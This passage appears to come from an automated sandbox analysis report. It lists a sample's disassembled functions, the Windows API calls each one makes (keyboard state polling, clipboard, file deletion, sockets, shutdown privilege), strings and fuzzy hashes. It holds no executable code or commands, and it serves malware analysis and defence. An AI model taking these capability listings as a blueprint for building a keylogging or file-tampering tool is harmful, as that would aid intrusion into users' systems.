                                          • Opcode ID: 33a13c2c759d84829fc90fae5fe8e01053b7e19d2ac8bbefa8fb103ef503630a
                                          • Instruction ID: b200794a801b2c18aa777eaba81edde9f9fc98e6a0417107f369f061ed0b0372
                                          • Opcode Fuzzy Hash: 33a13c2c759d84829fc90fae5fe8e01053b7e19d2ac8bbefa8fb103ef503630a
                                          • Instruction Fuzzy Hash: 0AE13071204310AFCB14DF25C895E6ABBE4EF89714F04996DF84AE72A2DB31ED05CB61
                                          Function 00E30219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00E30241
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00E302C2
                                          • GetKeyState.USER32(000000A0), ref: 00E302DD
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00E302F7
                                          • GetKeyState.USER32(000000A1), ref: 00E3030C
                                          • GetAsyncKeyState.USER32(00000011), ref: 00E30324
                                          • GetKeyState.USER32(00000011), ref: 00E30336
                                          • GetAsyncKeyState.USER32(00000012), ref: 00E3034E
                                          • GetKeyState.USER32(00000012), ref: 00E30360
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00E30378
                                          • GetKeyState.USER32(0000005B), ref: 00E3038A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: d5341b1b58f9ec8294c7c8759d5a7d4586d5b32f7f15559784a2633e95cb0b0b
                                          • Instruction ID: 6674fc3b8c82654ab11a4d961ccc934c2e30729ee3ebc6325785f4f40d40e9e3
                                          • Opcode Fuzzy Hash: d5341b1b58f9ec8294c7c8759d5a7d4586d5b32f7f15559784a2633e95cb0b0b
                                          • Instruction Fuzzy Hash: D341A5245047C96FFF359A64882C3A6BFA06F12348F08549DD5C6671C3EB945DC8C7A2
                                          Function 00E486D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • CoInitialize.OLE32 ref: 00E48718
                                          • CoUninitialize.COMBASE ref: 00E48723
                                          • CoCreateInstance.COMBASE(?,00000000,00000017,00E62BEC,?), ref: 00E48783
                                          • IIDFromString.COMBASE(?,?), ref: 00E487F6
                                          • VariantInit.OLEAUT32(?), ref: 00E48890
                                          • VariantClear.OLEAUT32(?), ref: 00E488F1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: ccecaeca296daafd76316187769902dd70c652bee2adba3200f4d481328c18d4
                                          • Instruction ID: 5dc75272b9b36faabbf9e68023fdcda6429751511b5065e038e95dc1fa860d64
                                          • Opcode Fuzzy Hash: ccecaeca296daafd76316187769902dd70c652bee2adba3200f4d481328c18d4
                                          • Instruction Fuzzy Hash: DA61B0706083019FD714DF24EA58B6EBBE4EF48714F54581EF985AB291CB70ED48CBA2
                                          Function 00E44458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 848dea906c2dc673349e3907464f6d21fdd0a3f6a0869a6b1d0d24bad3e0d5ea
                                          • Instruction ID: 4fa6f2aeea6e0036f4fe64d3a0a98c98c91d0b3208a7304c353876ab385c6054
                                          • Opcode Fuzzy Hash: 848dea906c2dc673349e3907464f6d21fdd0a3f6a0869a6b1d0d24bad3e0d5ea
                                          • Instruction Fuzzy Hash: D921A375300220AFDB14AF21EC19F6A77A8EF04715F109416F906EB2B1CB75AC00CBA4
                                          Function 00E33A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD48A1,?,?,00DD37C0,?), ref: 00DD48CE
                                            • Part of subcall function 00E34CD3: GetFileAttributesW.KERNEL32(?,00E33947), ref: 00E34CD4
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E33ADF
                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E33B87
                                          • MoveFileW.KERNEL32(?,?), ref: 00E33B9A
                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E33BB7
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E33BD9
                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E33BF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 4002782344-1173974218
                                          • Opcode ID: f80052073e51c053f75b222d1f365945691145110bacee5e8b3981a9722e629c
                                          • Instruction ID: cb73a9f8ceee0ab1c973e3bd6f5be4edb172e7f1b3e55ca64855bc5333329b9a
                                          • Opcode Fuzzy Hash: f80052073e51c053f75b222d1f365945691145110bacee5e8b3981a9722e629c
                                          • Instruction Fuzzy Hash: 65518F31805249AACF15EBA0DD96DEDBBB8AF14304F2451AAE44277191EF306F0DCBB0
                                          Function 00E3F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E3F6AB
                                          • Sleep.KERNEL32(0000000A), ref: 00E3F6DB
                                          • _wcscmp.LIBCMT ref: 00E3F6EF
                                          • _wcscmp.LIBCMT ref: 00E3F70A
                                          • FindNextFileW.KERNEL32(?,?), ref: 00E3F7A8
                                          • FindClose.KERNEL32(00000000), ref: 00E3F7BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 713712311-438819550
                                          • Opcode ID: 55708d40211561f1a599f378cbb947634180bb793e619489ad8653705eaecf96
                                          • Instruction ID: d7ff2b37de8c6cc0594454b17d25606f5a9d21cb58f892c55454c3c244cab068
                                          • Opcode Fuzzy Hash: 55708d40211561f1a599f378cbb947634180bb793e619489ad8653705eaecf96
                                          • Instruction Fuzzy Hash: 24415D71D1021A9FDF15EF64CC89AEEBBB4FF05314F145566E815B22A1EB309E44CBA0
                                          Function 00E5D74C Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • GetSystemMetrics.USER32(0000000F), ref: 00E5D78A
                                          • GetSystemMetrics.USER32(0000000F), ref: 00E5D7AA
                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E5D9E5
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E5DA03
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E5DA24
                                          • ShowWindow.USER32(00000003,00000000), ref: 00E5DA43
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E5DA68
                                          • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00E5DA8B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                          • String ID:
                                          • API String ID: 830902736-0
                                          • Opcode ID: ccc8deebdcca9cf9ea3e74ad20fc927231a63ece03b5f209d036ec0757e14a06
                                          • Instruction ID: 88989591dc04713ef09f175ae81abb50162add32753b2a8bccba6b260a48675e
                                          • Opcode Fuzzy Hash: ccc8deebdcca9cf9ea3e74ad20fc927231a63ece03b5f209d036ec0757e14a06
                                          • Instruction Fuzzy Hash: 65B1DC31504215EFCF28CF69C9857BE7BB1FF48706F08946AEC48AB295D730A958CB90
                                          Function 00DE4140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                          • API String ID: 0-1546025612
                                          • Opcode ID: c973e2d80c6e29bb6c55afc5e5686f22fec4e2eae49f92c84042f46b804946f3
                                          • Instruction ID: e842d9f3af995e2948c7d5e0de59547e89e24be5c0ff1fc81f963308b4ef6b26
                                          • Opcode Fuzzy Hash: c973e2d80c6e29bb6c55afc5e5686f22fec4e2eae49f92c84042f46b804946f3
                                          • Instruction Fuzzy Hash: 42A28F70E0425A8BDF24EF59C9907EEB7B1BF55714F2481A9D896A7280D7309EC1CBA0
                                          Function 00E2EB07 Relevance: 11.1, APIs: 1, Strings: 6, Instructions: 561stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E2EB19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
                                          • API String ID: 1659193697-2318614619
                                          • Opcode ID: 07885ee78107f9333a1930670d9a4f38a13e772dfd8660925b7d865db7f8e1ee
                                          • Instruction ID: eaf6b1876ebffdd547ee462ad71ddde97574cc299014fab7c2a56e4220afb1cb
                                          • Opcode Fuzzy Hash: 07885ee78107f9333a1930670d9a4f38a13e772dfd8660925b7d865db7f8e1ee
                                          • Instruction Fuzzy Hash: 6C323675A007159FDB28CF19D481A6AB7F0FF48310B15D56EE89AEB3A2DB70E941CB40
                                          Function 00DE58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: b5d69f96596611db9969a60910e810312ec6522dc989bd5623743b7c526976d2
                                          • Instruction ID: cb463605acb376408511de116570a5783316c35a927e0bea807d8b962dac98a3
                                          • Opcode Fuzzy Hash: b5d69f96596611db9969a60910e810312ec6522dc989bd5623743b7c526976d2
                                          • Instruction Fuzzy Hash: 6512CB70A00619DFCF14DFA5E981AEEB7F5FF48304F108269E406A7296EB35AD15CB60
                                          Function 00E5C27C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                            • Part of subcall function 00DD2344: GetCursorPos.USER32(?), ref: 00DD2357
                                            • Part of subcall function 00DD2344: ScreenToClient.USER32(00E967B0,?), ref: 00DD2374
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000001), ref: 00DD2399
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000002), ref: 00DD23A7
                                          • ReleaseCapture.USER32 ref: 00E5C2F0
                                          • SetWindowTextW.USER32(?,00000000), ref: 00E5C39A
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E5C3AD
                                          • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 00E5C48F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                          • API String ID: 973565025-2107944366
                                          • Opcode ID: 23a91737efbbef1f7b379c697c0cc6ddbb798cd38e8215a6443fa9cb6765e29d
                                          • Instruction ID: 9f54c69de70435e2870f4231cdb3e3608252eaaf089d52eed6147befdb201dc5
                                          • Opcode Fuzzy Hash: 23a91737efbbef1f7b379c697c0cc6ddbb798cd38e8215a6443fa9cb6765e29d
                                          • Instruction Fuzzy Hash: BA51B170204304AFDB14EF20CC56F6A7BE5EF88315F10492EF995A72E1DB71A948CB62
                                          Function 00E3545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E28CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E28D0D
                                            • Part of subcall function 00E28CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E28D3A
                                            • Part of subcall function 00E28CC3: GetLastError.KERNEL32 ref: 00E28D47
                                          • ExitWindowsEx.USER32(?,00000000), ref: 00E3549B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: 9b47ea9b487251a10eb097e2c11314ff582c665093ae64b13c155180d610cfcd
                                          • Instruction ID: 3f15324224c875855f0db419e0d55e3be4cc3df193fad51cd81db4c8fdbac69b
                                          • Opcode Fuzzy Hash: 9b47ea9b487251a10eb097e2c11314ff582c665093ae64b13c155180d610cfcd
                                          • Instruction Fuzzy Hash: 7001D832655B116EE72C6674AC4EBBA7A98AB05353F282521FD27F22D3D6905C80C590
                                          Function 00E46596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00E465EF
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E465FE
                                          • bind.WS2_32(00000000,?,00000010), ref: 00E4661A
                                          • listen.WS2_32(00000000,00000005), ref: 00E46629
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E46643
                                          • closesocket.WS2_32(00000000), ref: 00E46657
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: ecba1863662a6fc26a1c15c0bcad860e825fa3eed6ba009b5e7ffaa2a5a1a631
                                          • Instruction ID: e10a8fac6125a7489b17ddd361f5ee4f9e1f9d48528e1d449608d890cdc04f94
                                          • Opcode Fuzzy Hash: ecba1863662a6fc26a1c15c0bcad860e825fa3eed6ba009b5e7ffaa2a5a1a631
                                          • Instruction Fuzzy Hash: 9A21CE31200210AFCB04AF24E845B6EB7F9EF49325F11959AE956B73D1CB30AD048B61
                                          Function 00DE5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF0FF6: std::exception::exception.LIBCMT ref: 00DF102C
                                            • Part of subcall function 00DF0FF6: __CxxThrowException@8.LIBCMT ref: 00DF1041
                                          • _memmove.LIBCMT ref: 00E2062F
                                          • _memmove.LIBCMT ref: 00E20744
                                          • _memmove.LIBCMT ref: 00E207EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID:
                                          • API String ID: 1300846289-0
                                          • Opcode ID: 1d0f45693cdc10c0e175141240aeaf90635ec43f459a9b7e310e4770dcfb5f32
                                          • Instruction ID: 27369e3d573438aa97ebcaae6dd42a20f075fe81c56c5c792b7bfc41146cd5cf
                                          • Opcode Fuzzy Hash: 1d0f45693cdc10c0e175141240aeaf90635ec43f459a9b7e310e4770dcfb5f32
                                          • Instruction Fuzzy Hash: E302A170A00219DFCF04DF65E981ABE7BB5FF44344F158069E80AEB296EB31D954CBA1
                                          Function 00DD1287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00DD19FA
                                          • GetSysColor.USER32(0000000F), ref: 00DD1A4E
                                          • SetBkColor.GDI32(?,00000000), ref: 00DD1A61
                                            • Part of subcall function 00DD1290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00DD12D8
                                          Memory Dump Source
